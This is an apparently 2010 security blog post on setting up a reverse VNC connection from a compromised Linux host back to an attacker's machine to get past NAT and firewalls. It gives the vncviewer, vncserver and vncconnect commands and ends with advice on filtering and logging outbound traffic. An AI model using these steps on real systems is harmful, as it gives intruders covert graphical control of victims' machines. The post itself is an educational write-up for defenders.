Thursday, 16 December 2010

Setting up a reverse VNC connection (linux version)

If you are reading this, you have probably heard of a reverse shell, where an attacker uses a buffer overflow (or some other exploit) to connect from the victim back to an attacking system, who has a public IP address (perhaps bypassing a NAT or Firewall rule-set).

A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC can be useful.

If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.

This article is only intended for educational purposes. Please do not use this to try to bypass security controls.


How to set this up

In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.

On the attacking system (which has a public IP address) start vncviewer as follows:

vncviewer -listen

You should get a response something like:

vncviewer -listen: Listening on port 5500


On the target system, you can start the VNC server and enter a password as follows:

vncserver :1

It is then possible to use vncconnect to connect the local vncserver on the target system, back to the attacker system:

vncconnect -display :1 :5500

This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attackers desktop.


Of course, these connections could be run on different ports (dependent on firewall rules) redirected with port-redirectors, or tunneled over other protocols, perhaps SSL using stunnel for example.

Similar solutions are just as easy with Windows systems, so definitely something to be aware of.


Mitigations
  • When definining Firewall rules, it is very important to focus on outbound rules (in addition to inbound rules)
  • Outbound connections should be logged and monitored to help identify hackers, virus infection, and technical employees trying to bypass security restrictions.

1 comment: